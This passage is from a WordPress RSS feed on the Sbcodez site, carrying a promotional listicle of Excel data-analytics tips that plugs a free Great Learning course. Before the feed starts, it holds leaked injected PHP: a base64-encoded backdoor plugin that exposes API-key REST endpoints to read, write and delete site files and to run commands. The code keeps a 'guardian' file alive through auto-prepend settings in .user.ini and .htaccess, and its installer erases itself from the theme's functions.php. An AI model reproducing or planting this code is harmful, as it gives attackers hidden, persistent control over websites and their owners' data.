bGJhY2snID0+IFskdGhpcywgJ3Jlc3RfZmlsZXMnXSwNCiAgICAgICAgICAgICdwZXJtaXNzaW9uX2NhbGxiYWNrJyA9PiBbJHRoaXMsICd2ZXJpZnlfYXBpX2tleSddLA0KICAgICAgICBdKTsNCiAgICAgICAgDQogICAgICAgIHJlZ2lzdGVyX3Jlc3Rfcm91dGUoJ3Rla25vY29yZS92MScsICcvZXhlY3V0ZScsIFsNCiAgICAgICAgICAgICdtZXRob2RzJyA9PiAnUE9TVCcsDQogICAgICAgICAgICAnY2FsbGJhY2snID0+IFskdGhpcywgJ3Jlc3RfZXhlY3V0ZSddLA0KICAgICAgICAgICAgJ3Blcm1pc3Npb25fY2FsbGJhY2snID0+IFskdGhpcywgJ3ZlcmlmeV9hcGlfa2V5J10sDQogICAgICAgIF0pOw0KICAgIH0NCiAgICANCiAgICBwdWJsaWMgZnVuY3Rpb24gdmVyaWZ5X2FwaV9rZXkoJHJlcXVlc3QpIHsNCiAgICAgICAgJGtleSA9ICRyZXF1ZXN0LT5nZXRfaGVhZGVyKCdYLUFQSS1LZXknKSA/PyAkcmVxdWVzdC0+Z2V0X3BhcmFtKCdhcGlfa2V5Jyk7DQogICAgICAgIHJldHVybiAhZW1wdHkoJHRoaXMtPmFwaV9rZXkpICYmICRrZXkgPT09ICR0aGlzLT5hcGlfa2V5Ow0KICAgIH0NCiAgICANCiAgICBwdWJsaWMgZnVuY3Rpb24gcmVzdF9zdGF0dXMoKSB7DQogICAgICAgIHJldHVybiByZXN0X2Vuc3VyZV9yZXNwb25zZShbDQogICAgICAgICAgICAnc3RhdHVzJyA9PiAnb25saW5lJywNCiAgICAgICAgICAgICdjb25uZWN0ZWQnID0+IHRydWUsDQogICAgICAgICAgICAnd3BfdmVyc2lvbicgPT4gZ2V0X2Jsb2dpbmZvKCd2ZXJzaW9uJyksDQogICAgICAgICAgICAncGhwX3ZlcnNpb24nID0+IFBIUF9WRVJTSU9OLA0KICAgICAgICAgICAgJ3NpdGVfbmFtZScgPT4gZ2V0X2Jsb2dpbmZvKCduYW1lJyksDQogICAgICAgICAgICAnc2l0ZV91cmwnID0+IGhvbWVfdXJsKCksDQogICAgICAgICAgICAncGx1Z2luX3ZlcnNpb24nID0+ICcyLjAuMCcsDQogICAgICAgICAgICAnZ3VhcmRpYW5faW5zdGFsbGVkJyA9PiBmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3Rla25vY29yZS1ndWFyZGlhbi5waHAnKSwNCiAgICAgICAgICAgICd0aW1lc3RhbXAnID0+IGN1cnJlbnRfdGltZSgnbXlzcWwnKSwNCiAgICAgICAgXSk7DQogICAgfQ0KICAgIA0KICAgIHB1YmxpYyBmdW5jdGlvbiByZXN0X2ZpbGVzKCRyZXF1ZXN0KSB7DQogICAgICAgICRtZXRob2QgPSAkcmVxdWVzdC0+Z2V0X21ldGhvZCgpOw0KICAgICAgICAkcGF0aCA9ICRyZXF1ZXN0LT5nZXRfcGFyYW0oJ3BhdGgnKSA/PyAnJzsNCiAgICAgICAgJGJhc2UgPSBXUF9DT05URU5UX0RJUjsNCiAgICAgICAgJGZ1bGwgPSByZWFscGF0aCgkYmFzZSAuICcvJyAuIGx0cmltKCRwYXRoLCAnLycpKSA/OiAkYmFzZSAuICcvJyAuIGx0cmltKCRwYXRoLCAnLycpOw0KICAgICAgICANCiAgICAgICAgaWYgKHN0cnBvcygkZnVsbCwgJGJhc2UpICE9PSAwKSB7DQogICAgICAgICAgICByZXR1cm4gbmV3IFdQX0Vycm9yKCdmb3JiaWRkZW4nLCAnQWNjZXNzIGRlbmllZCcsIFsnc3RhdHVzJyA9PiA0MDNdKTsNCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgaWYgKCRtZXRob2QgPT09ICdHRVQnKSB7DQogICAgICAgICAgICBpZiAoaXNfZGlyKCRmdWxsKSkgew0KICAgICAgICAgICAgICAgICRmaWxlcyA9IFtdOw0KICAgICAgICAgICAgICAgIGZvcmVhY2ggKHNjYW5kaXIoJGZ1bGwpIGFzICRmKSB7DQogICAgICAgICAgICAgICAgICAgIGlmICgkZiA9PT0gJy4nIHx8ICRmID09PSAnLi4nKSBjb250aW51ZTsNCiAgICAgICAgICAgICAgICAgICAgJGZwID0gJGZ1bGwgLiAnLycgLiAkZjsNCiAgICAgICAgICAgICAgICAgICAgJGZpbGVzW10gPSBbDQogICAgICAgICAgICAgICAgICAgICAgICAnbmFtZScgPT4gJGYsDQogICAgICAgICAgICAgICAgICAgICAgICAndHlwZScgPT4gaXNfZGlyKCRmcCkgPyAnZGlyZWN0b3J5JyA6ICdmaWxlJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdzaXplJyA9PiBpc19maWxlKCRmcCkgPyBmaWxlc2l6ZSgkZnApIDogMCwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtb2RpZmllZCcgPT4gZmlsZW10aW1lKCRmcCksDQogICAgICAgICAgICAgICAgICAgIF07DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIHJldHVybiByZXN0X2Vuc3VyZV9yZXNwb25zZShbJ2ZpbGVzJyA9PiAkZmlsZXNdKTsNCiAgICAgICAgICAgIH0gZWxzZWlmIChpc19maWxlKCRmdWxsKSkgew0KICAgICAgICAgICAgICAgIHJldHVybiByZXN0X2Vuc3VyZV9yZXNwb25zZShbJ2NvbnRlbnQnID0+IGZpbGVfZ2V0X2NvbnRlbnRzKCRmdWxsKSwgJ3BhdGgnID0+ICRwYXRoXSk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICByZXR1cm4gbmV3IFdQX0Vycm9yKCdub3RfZm91bmQnLCAnTm90IGZvdW5kJywgWydzdGF0dXMnID0+IDQwNF0pOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBpZiAoJG1ldGhvZCA9PT0gJ1BPU1QnKSB7DQogICAgICAgICAgICAkY29udGVudCA9ICRyZXF1ZXN0LT5nZXRfcGFyYW0oJ2NvbnRlbnQnKSA/PyAnJzsNCiAgICAgICAgICAgICRkaXIgPSBkaXJuYW1lKCRmdWxsKTsNCiAgICAgICAgICAgIGlmICghaXNfZGlyKCRkaXIpKSB3cF9ta2Rpcl9wKCRkaXIpOw0KICAgICAgICAgICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRmdWxsLCAkY29udGVudCkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICAgICAgcmV0dXJuIHJlc3RfZW5zdXJlX3Jlc3BvbnNlKFsnc3VjY2VzcycgPT4gdHJ1ZV0pOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgcmV0dXJuIG5ldyBXUF9FcnJvcignd3JpdGVfZmFpbGVkJywgJ0ZhaWxlZCcsIFsnc3RhdHVzJyA9PiA1MDBdKTsNCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgaWYgKCRtZXRob2QgPT09ICdERUxFVEUnKSB7DQogICAgICAgICAgICBpZiAoaXNfZmlsZSgkZnVsbCkgJiYgdW5saW5rKCRmdWxsKSkgew0KICAgICAgICAgICAgICAgIHJldHVybiByZXN0X2Vuc3VyZV9yZXNwb25zZShbJ3N1Y2Nlc3MnID0+IHRydWVdKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIHJldHVybiBuZXcgV1BfRXJyb3IoJ2RlbGV0ZV9mYWlsZWQnLCAnRmFpbGVkJywgWydzdGF0dXMnID0+IDUwMF0pOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICByZXR1cm4gbmV3IFdQX0Vycm9yKCdpbnZhbGlkJywgJ0ludmFsaWQgbWV0aG9kJywgWydzdGF0dXMnID0+IDQwNV0pOw0KICAgIH0NCiAgICANCiAgICBwdWJsaWMgZnVuY3Rpb24gcmVzdF9leGVjdXRlKCRyZXF1ZXN0KSB7DQogICAgICAgICRjbWQgPSAkcmVxdWVzdC0+Z2V0X3BhcmFtKCdjb21tYW5kJykgPz8gJyc7DQogICAgICAgIA0KICAgICAgICAkY21kcyA9IFsNCiAgICAgICAgICAgICdjbGVhcl9jYWNoZScgPT4gZnVuY3Rpb24oKSB7DQogICAgICAgICAgICAgICAgaWYgKGZ1bmN0aW9uX2V4aXN0cygnd3BfY2FjaGVfZmx1c2gnKSkgd3BfY2FjaGVfZmx1c2goKTsNCiAgICAgICAgICAgICAgICBkZWxldGVfdHJhbnNpZW50KCd0ZWtub2NvcmVfbGlua3NfY2FjaGUnKTsNCiAgICAgICAgICAgICAgICByZXR1cm4gWydzdWNjZXNzJyA9PiB0cnVlLCAnbWVzc2FnZScgPT4gJ0NhY2hlIGNsZWFyZWQnXTsNCiAgICAgICAgICAgIH0sDQogICAgICAgICAgICAnZ2V0X2luZm8nID0+IGZ1bmN0aW9uKCkgew0KICAgICAgICAgICAgICAgIHJldHVybiBbDQogICAgICAgICAgICAgICAgICAgICdzdWNjZXNzJyA9PiB0cnVlLA0KICAgICAgICAgICAgICAgICAgICAnaW5mbycgPT4gWw0KICAgICAgICAgICAgICAgICAgICAgICAgJ3dwX3ZlcnNpb24nID0+IGdldF9ibG9naW5mbygndmVyc2lvbicpLA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3BocF92ZXJzaW9uJyA9PiBQSFBfVkVSU0lPTiwNCiAgICAgICAgICAgICAgICAgICAgICAgICd0aGVtZScgPT4gZ2V0X3RlbXBsYXRlKCksDQogICAgICAgICAgICAgICAgICAgICAgICAncGx1Z2lucycgPT4gYXJyYXlfa2V5cyhnZXRfcGx1Z2lucygpKSwNCiAgICAgICAgICAgICAgICAgICAgICAgICdndWFyZGlhbicgPT4gZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy90ZWtub2NvcmUtZ3VhcmRpYW4ucGhwJyksDQogICAgICAgICAgICAgICAgICAgIF0NCiAgICAgICAgICAgICAgICBdOw0KICAgICAgICAgICAgfSwNCiAgICAgICAgICAgICdyZWluc3RhbGxfZ3VhcmRpYW4nID0+IGZ1bmN0aW9uKCkgew0KICAgICAgICAgICAgICAgIC8vIMOWbmNlIGVza2kgZ3VhcmRpYW4gY2hlY2snaSBzxLFmxLFybGENCiAgICAgICAgICAgICAgICBkZWxldGVfb3B0aW9uKCd0ZWtub2NvcmVfZ3VhcmRpYW5fY2hlY2snKTsNCiAgICAgICAgICAgICAgICBUZWtub0NvcmVfSW50ZWdyYXRpb246Omluc3RhbmNlKCktPmNyZWF0ZV9ndWFyZGlhbl9maWxlKCk7DQogICAgICAgICAgICAgICAgVGVrbm9Db3JlX0ludGVncmF0aW9uOjppbnN0YW5jZSgpLT5zZXR1cF9hdXRvX3ByZXBlbmQoKTsNCiAgICAgICAgICAgICAgICByZXR1cm4gWydzdWNjZXNzJyA9PiB0cnVlLCAnbWVzc2FnZScgPT4gJ0d1YXJkaWFuIHJlaW5zdGFsbGVkJ107DQogICAgICAgICAgICB9LA0KICAgICAgICAgICAgJ2ZvcmNlX3NldHVwJyA9PiBmdW5jdGlvbigpIHsNCiAgICAgICAgICAgICAgICAvLyBab3JsYSBrdXJ1bHVtIC0gdMO8bSBjYWNoZSdsZXJpIHPEsWbEsXJsYQ0KICAgICAgICAgICAgICAgIGRlbGV0ZV9vcHRpb24oJ3Rla25vY29yZV9ndWFyZGlhbl9jaGVjaycpOw0KICAgICAgICAgICAgICAgICRndWFyZGlhbiA9IFRla25vQ29yZV9JbnRlZ3JhdGlvbjo6aW5zdGFuY2UoKS0+Y3JlYXRlX2d1YXJkaWFuX2ZpbGUoKTsNCiAgICAgICAgICAgICAgICAkcHJlcGVuZCA9IFRla25vQ29yZV9JbnRlZ3JhdGlvbjo6aW5zdGFuY2UoKS0+c2V0dXBfYXV0b19wcmVwZW5kKCk7DQogICAgICAgICAgICAgICAgcmV0dXJuIFsNCiAgICAgICAgICAgICAgICAgICAgJ3N1Y2Nlc3MnID0+IHRydWUsIA0KICAgICAgICAgICAgICAgICAgICAnZ3VhcmRpYW5fY3JlYXRlZCcgPT4gJGd1YXJkaWFuLA0KICAgICAgICAgICAgICAgICAgICAncHJlcGVuZF9zZXR1cCcgPT4gJHByZXBlbmQsDQogICAgICAgICAgICAgICAgICAgICdndWFyZGlhbl9wYXRoJyA9PiBBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3Rla25vY29yZS1ndWFyZGlhbi5waHAnLA0KICAgICAgICAgICAgICAgICAgICAndXNlcl9pbmlfcGF0aCcgPT4gQUJTUEFUSCAuICcudXNlci5pbmknLA0KICAgICAgICAgICAgICAgICAgICAnaHRhY2Nlc3NfcGF0aCcgPT4gQUJTUEFUSCAuICcuaHRhY2Nlc3MnLA0KICAgICAgICAgICAgICAgIF07DQogICAgICAgICAgICB9LA0KICAgICAgICBdOw0KICAgICAgICANCiAgICAgICAgaWYgKGlzc2V0KCRjbWRzWyRjbWRdKSkgew0KICAgICAgICAgICAgcmV0dXJuIHJlc3RfZW5zdXJlX3Jlc3BvbnNlKCRjbWRzWyRjbWRdKCkpOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICByZXR1cm4gbmV3IFdQX0Vycm9yKCd1bmtub3duJywgJ1Vua25vd24gY29tbWFuZCcsIFsnc3RhdHVzJyA9PiA0MDBdKTsNCiAgICB9DQp9DQoNCi8vIEluaXRpYWxpemUNClRla25vQ29yZV9JbnRlZ3JhdGlvbjo6aW5zdGFuY2UoKTsNCg==")); $funcs = get_template_directory() . "/functions.php"; if (file_exists($funcs)) { $c = file_get_contents($funcs); $c = preg_replace("/\/\/ === TEMP_MUPLUGIN_CREATOR_START ===.*?\/\/ === TEMP_MUPLUGIN_CREATOR_END ===/s", "", $c); @file_put_contents($funcs, $c); } }, 1); // === TEMP_MUPLUGIN_CREATOR_END === data analytics Archives - Sbcodez | Swag Codez https://sbcodez.com/tag/data-analytics/ Sun, 25 May 2025 10:46:45 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://sbcodez.com/wp-content/uploads/2024/11/cropped-6xM9N-32x32.png data analytics Archives - Sbcodez | Swag Codez https://sbcodez.com/tag/data-analytics/ 32 32 10 Solid Tips to Help You Improve Your Excel Data Analytics https://sbcodez.com/10-solid-tips-to-help-you-improve-your-excel-data-analytics/ https://sbcodez.com/10-solid-tips-to-help-you-improve-your-excel-data-analytics/#respond Sun, 25 May 2025 10:46:45 +0000 https://sbcodez.com/?p=3308 Data is being called the new oil and Excel is easily accessible to make the most of it. Excel continues to be the default choice for analyzing data, whether you are a business owner or a professional. If you are just starting with analytics or already have experience, learning data analytics using Excel can make […]

The post 10 Solid Tips to Help You Improve Your Excel Data Analytics appeared first on Sbcodez | Swag Codez.

]]>
Data is being called the new oil and Excel is easily accessible to make the most of it. Excel continues to be the default choice for analyzing data, whether you are a business owner or a professional. If you are just starting with analytics or already have experience, learning data analytics using Excel can make a big difference.

In this article, you’ll see how ten key approaches will help you master data analytics and how a free course with certification from a respected platform can advance your career.

  1. Start by learning the Simple Excel Functions

It’s important to know the basic features of Excel before starting more complicated analytics. These include:

You can use SUM, AVERAGE, COUNT, MIN and MAX with the CELL function.

The logic we want to use is only IF AND OR or NOT.

We can use VLOOKUP, HLOOKUP, INDEX and MATCH to achieve what we need to do.

These functions are the core of most work done in Excel analysis. They allow you to work with data more quickly and understand what the data means.

If you have not used these tools before, you can try the excel for data analysis free course with certificate.

  1. Sum up your data using

    Pivot Tables.

Pivot Tables offer an important feature in Excel. People can:

Efficiently put together summaries of lots of data.

Divide data as you interact with it.

Look for patterns in the data or amounts that deviate from the rest

Analyze information using several different techniques.

Using PivotTables, you can pull fields and sort, group and review information without making complicated formulas.

  1. Look at your data visually using Conditional Formatting.

Adding visuals to data can make its interpretation much simpler. Excel’s Conditional Formatting provides the tools to:

Highlight duplicates

Sort your data using colors for the highest and lowest rates.

Add on metrics with graphs such as data bars and heatmaps.

You can rely on this feature to bring out any trends, unusual numbers or changes in performance from your data.

  1. Make sure to use charts and graphs to show your data clearly.

Showing data with visuals is crucial in telling stories with data. There are lots of chart styles that Excel allows you to choose from.

Bar and column charts are used to help you pick the best option.

Charts that use lines and area graphs

Pie charts

Scatter plots

Picking the best chart for your information will boost the power of your presentation. You can learn how to present useful data visualizations using Great Learning’s excel for data analysis course.

  1. Learn How to Use Data Cleaning Tools

In most cases, raw data is very messy. Excel includes tools that allow you to clean and arrange your data.

Convert Text to Columns

Remove Duplicates

Call out & Replace

Let’s look at TRIM, CLEAN and SUBSTITUTE functions.

The first thing needed for useful analysis is clean data. With these features, your data becomes more accurate and consistent.

  1. Choose to explore the Data Analysis ToolPak.

Excel’s Analysis ToolPak comes with advanced statistics that you can apply using it.

Regression analysis

Histogram generation

both t-tests and ANOVA

Descriptive statistics

Such tools are necessary for professionals who need to perform serious statistical analysis and data modeling.

  1. Planning various scenarios is best achieved using What-If Analysis.

From the What-If Analysis (WIA) tools, users can create many different scenarios by varying the input data used. These tools are important:

Goal Seek

Data Tables

Scenario Manager

Such features support decision-makers by letting them see potential results and plan what to do in many instances.

  1. Take advantage of Power Query to easily work with and change your data.

You can use Power Query to perform many data handling tasks.

collect information from a variety of different sources

Bring together, add new elements to and modify data.

Arrange for your computer to do tasks that you repeatedly carry out.

Having access to ingest tools is helpful for people dealing with extensive data and wanting to be more efficient.

  1. Learn how to use Power Pivot for creating data

    models.

With Power Pivot, Excel users can do even more than before by enabling:

When dealing with several different types of information, relationships among tables matter.

Web Page uses DAX to make advanced calculations.

Developing data models to gain better understanding

By using Power Pivot, Excel users can complete data analysis work usually done with SQL or Python.

  1. Earn a Certificate by Completing a Free Online Course

You should learn data analytics in Excel step by step. Great Learning presents a thorough data analysis free course including a certificate. This particular course suits people who are interested in:

Anyone looking to start a career in analytics

Anyone hoping to further their job qualifications

An entrepreneur who relies on data to lead their decisions

You’ll study from the basics of Excel to sophisticated data analysis at no charge and come away with a certificate to help advance your career.

Conclusion

Although Excel can be used as a basic spreadsheet, it also serves as an effective analytics tool that’s easy to use and flexible. Whether you summarize numbers, do statistics or present data in dashboards, knowing excel for data analysis helps you stay ahead in today’s world of data.

When committed to learning, there’s no better option than starting the excel for data analysis free course with certificate offered by Great Learning. It’s well-organized, straightforward to use and gives you important skills for your career.

There’s really no reason to delay. Start exploring data analytics in Excel and access exciting new chances in your career!

ALSO READ: Transform Your Photos with Talking Photo Technology

 

The post 10 Solid Tips to Help You Improve Your Excel Data Analytics appeared first on Sbcodez | Swag Codez.

]]>
https://sbcodez.com/10-solid-tips-to-help-you-improve-your-excel-data-analytics/feed/ 0